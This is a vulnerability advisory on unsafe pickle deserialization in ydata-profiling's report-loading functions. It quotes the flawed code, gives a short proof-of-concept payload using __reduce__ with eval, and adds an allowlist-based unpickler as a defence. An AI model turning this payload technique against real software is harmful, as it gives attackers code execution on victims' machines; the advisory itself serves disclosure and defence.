Pickle Load in Serialized Profile Load
June 4, 2024

Products Impacted
This vulnerability is present in Ydata-profiling v3.7.0 or newer.
CVSS Score: 7.8
AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
CWE Categorization
CWE-502: Deserialization of Untrusted Data.
Details
In src/ydata_profiling/serialize_report.py, pickle is used to load serialized profiles within the loads function. The load function relies on the loads function and is therefore also vulnerable:

    def loads(self, data: bytes) -> Union["ProfileReport", "SerializeReport"]:
        """
        Deserialize the serialized report
        Args:
            data: The bytes of a serialize ProfileReport object.
        Raises:
            ValueError: if ignore_config is set to False and the configs do not match.
        Returns:
            self
        """
        import pickle
        try:
            # Unsafe: the caller-supplied bytes go straight into pickle.loads
            (
                df_hash,
                loaded_config,
                loaded_description_set,
                loaded_report,
            ) = pickle.loads(data)

This can be abused by generating a malicious pickle and using the load or loads functions:

    from ydata_profiling import ProfileReport
    import pickle

    class Exploit:
        def __reduce__(self):
            # pickle calls eval("print('pwned')") when these bytes are loaded
            return eval, ("print('pwned')",)

    profile = ProfileReport().loads(pickle.dumps(Exploit()))

In the example above, the output of pickle.dumps is passed directly into the loads function. In a real attack, the user would be affected through the load function, or by passing the bytes into the loads function after reading them from a file or over the network.
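
One defensive option, shown as an added example that is not ydata-profiling's code or its fix: an unpickler whose find_class refuses every global outside an allowlist, so the payload above is rejected before eval is ever resolved. The names AllowlistUnpickler, restricted_loads and blocked_reason, and the contents of ALLOWED_GLOBALS, are assumptions for illustration.

```python
import io
import pickle
from collections import OrderedDict

# Assumption: illustrative allowlist of (module, name) pairs the loader may
# resolve. A real serialized profile needs its own reviewed list.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowlistUnpickler(pickle.Unpickler):
    """Unpickler that refuses every global not explicitly allowlisted."""

    def find_class(self, module, name):
        # Called when a GLOBAL/STACK_GLOBAL opcode is processed, i.e. before
        # any __reduce__ callable can be resolved and invoked.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global {module}.{name}")


def restricted_loads(data: bytes):
    """Hypothetical replacement for pickle.loads on untrusted profile bytes."""
    return AllowlistUnpickler(io.BytesIO(data)).load()


class Exploit:
    """Payload class from the advisory; only serialized here, never loaded freely."""

    def __reduce__(self):
        return eval, ("print('pwned')",)


def blocked_reason(data: bytes):
    """Return the rejection message, or None if the data loaded."""
    try:
        restricted_loads(data)
    except pickle.UnpicklingError as exc:
        return str(exc)
    return None


if __name__ == "__main__":
    # Constructed sample shaped like the 4-tuple that loads() unpacks.
    benign = pickle.dumps(("df-hash", {"title": "report"}, OrderedDict(a=1), None))
    print(restricted_loads(benign))
    print(blocked_reason(pickle.dumps(Exploit())))
```

An allowlist only reduces exposure to the classes it names; each allowed class must itself be safe to construct from untrusted input.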